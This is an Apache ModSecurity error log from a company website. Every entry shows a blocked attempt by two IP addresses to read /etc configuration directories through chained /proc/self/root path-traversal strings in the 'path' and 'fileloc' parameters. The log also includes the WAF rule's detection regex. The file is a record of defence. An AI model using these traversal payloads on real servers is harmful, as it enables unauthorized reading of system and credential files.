[Mon Mar 16 10:16:28.719116 2026] [:error] [pid 10709:tid 140411725141760] [client 74.7.241.46:42208] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgCrBXjF1vJNtV6CWrrCQAAAcI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:16:29.580674 2026] [:error] [pid 32654:tid 140411741927168] [client 74.7.243.203:53362] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgCrQlT9VtDQc7bgUyeLAAAAQA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:16:32.036266 2026] [:error] [pid 21946:tid 140411716749056] [client 74.7.243.203:41742] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgCsHbQATo66fKoS7w_bAAAAMM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:16:36.756645 2026] [:error] [pid 21533:tid 140411574073088] [client 74.7.243.203:41748] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgCtHjZBu2q05ozVU9HmAAAAVQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:16:39.126478 2026] [:error] [pid 10709:tid 140411540502272] [client 74.7.243.203:41764] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgCtxXjF1vJNtV6CWrrEgAAAdg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:16:45.156098 2026] [:error] [pid 21946:tid 140411607643904] [client 74.7.241.46:42214] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgCvXbQATo66fKoS7w_eAAAANA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:16:45.780149 2026] [:error] [pid 21533:tid 140411641214720] [client 74.7.243.203:44432] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgCvXjZBu2q05ozVU9HnwAAAUw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:16:49.207471 2026] [:error] [pid 21805:tid 140411699963648] [client 74.7.243.203:44440] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgCwbABkC4fWIHEf8HdIAAAAEU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:16:51.843592 2026] [:error] [pid 10831:tid 140411683178240] [client 74.7.243.203:53602] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgCw46lpbStxTqkSktgNAAAAkc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:16:53.169982 2026] [:error] [pid 10709:tid 140411649607424] [client 74.7.243.203:53618] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgCxRXjF1vJNtV6CWrrHwAAAcs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:16:53.187064 2026] [:error] [pid 21533:tid 140411708356352] [client 74.7.241.46:39000] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgCxXjZBu2q05ozVU9HpgAAAUQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:16:55.604008 2026] [:error] [pid 21806:tid 140411540502272] [client 74.7.243.203:53628] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgCx9SswJuvopo3lOhR-gAAAJg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:16:56.946039 2026] [:error] [pid 21533:tid 140411674785536] [client 74.7.243.203:53644] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgCyHjZBu2q05ozVU9HqAAAAUg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:16:59.274368 2026] [:error] [pid 21805:tid 140411582465792] [client 74.7.243.203:53660] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgCy7ABkC4fWIHEf8HdJAAAAFM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:17:01.671408 2026] [:error] [pid 21946:tid 140411649607424] [client 74.7.243.203:40880] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgCzXbQATo66fKoS7w_ewAAAMs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:17:02.971565 2026] [:error] [pid 21805:tid 140411733534464] [client 74.7.243.203:40886] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgCzrABkC4fWIHEf8HdJgAAAEE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:17:32.818508 2026] [:error] [pid 10709:tid 140411540502272] [client 74.7.243.203:40898] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgC7BXjF1vJNtV6CWrrWQAAAdg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:17:34.122573 2026] [:error] [pid 21533:tid 140411666392832] [client 74.7.243.203:32774] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgC7njZBu2q05ozVU9HrAAAAUk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:17:35.514122 2026] [:error] [pid 21946:tid 140411691570944] [client 74.7.243.203:32788] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgC73bQATo66fKoS7w_gQAAAMY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:17:47.418940 2026] [:error] [pid 10651:tid 140411574073088] [client 74.7.243.203:32800] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgC-7ysWC90G-1nBrA3IwAAAZQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:17:48.503294 2026] [:error] [pid 10651:tid 140411666392832] [client 74.7.241.46:51404] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgC_LysWC90G-1nBrA3JQAAAYk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
